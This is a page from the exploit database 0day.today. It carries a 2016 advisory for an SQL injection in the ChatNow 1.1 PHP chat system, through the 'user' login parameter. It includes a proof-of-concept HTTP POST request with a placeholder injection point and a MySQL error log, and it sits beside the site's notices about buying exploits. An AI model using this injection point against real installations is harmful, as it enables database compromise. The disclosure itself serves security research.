0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ChatNow 1.1 SQL Injection Vulnerability
===================================================== [#] Exploit Title : ChatNow 1.1 - SQL Injection Web Vulnerability [#] Date Discovered : 2016-11-17 [#] Affected Product(s): chatNow v1.1 - Content Management System [#] Exploitation Technique: Remote [#] Severity Level: High [#] Tested OS : Windows 10 ===================================================== [#] Product & Service Introduction: =================================== Chat Open Source desenvolvido com PHP e MySQL. Com suporte para envio de videos do Youtube e imagens. Construido com jQuery. (Copy of the Vendor Homepage: http://chatnow.thiagosf.net/ ) [#] Technical Details & Description: ==================================== A remote sql injection web vulnerability has been discovered in the official chatNow v1.1 content management system. The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the application. The sql injection vulnerability is located in input name `user` which is found in the connection form. Remote attackers are able to execute own sql commands, the attack vector of the vulnerability is application-side and the request method to inject is POST. Request Method(s): [+] POST Vulnerable Input (Name): [+] user [#] Proof of Concept (PoC): =========================== The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction. For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue. --- PoC Session Logs [POST]--- Status: 200 [OK] Host: localhost/chatNow/ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/chatNow/chat/login.php Cookie: PHPSESSID=3g7cs1mammh9p767oed1v187t0; __utma=32540652.120788788.1479381166.1479381166.1479381166.1; __utmb=32540652.5.10.1479381166; __utmc=32540652; __utmz=32540652.1479381166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1 Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 36 - POST Method: user=[SQL INJECTION HERE]id_room=14&captcha=5253 --- PoC Error Logs --- SELECT * FROM chat_users WHERE user = "1"'" ORDER BY id DESC You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''" ORDER BY id DESC' at line 1 [#] Vulnerability Disclosure Timeline: ====================================== 2016-11-17 : Discovery of the Vulnerability 2016-11-17 : Contact the Vendor (No Response) 2016-11-28 : Public Disclosure # 0day.today [2024-11-16] #